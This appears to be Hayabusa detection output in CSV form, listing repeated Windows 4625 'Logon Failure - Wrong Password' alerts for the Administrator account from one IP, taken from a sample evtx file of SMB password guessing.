2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXmfjxrGC3liZ2oh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72JLcUBrhOoXPLzD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sRoFpK2ZvBYy4jGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9KReiI3k2WIKpxFq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsfSzPbji6ARhU0k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axeCxygvJ4zL4Xoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y64sc51Y7vbiFTIQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o395tRQcfRBTTCSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1R4wlYWS4SkM3dF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsZy0Yjvk720Mu22 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c8RusStjhReKBmS0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eJuPYLTcGaGvErLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: raCbua01mzU1Djuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fnt8atAbMtxXivUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
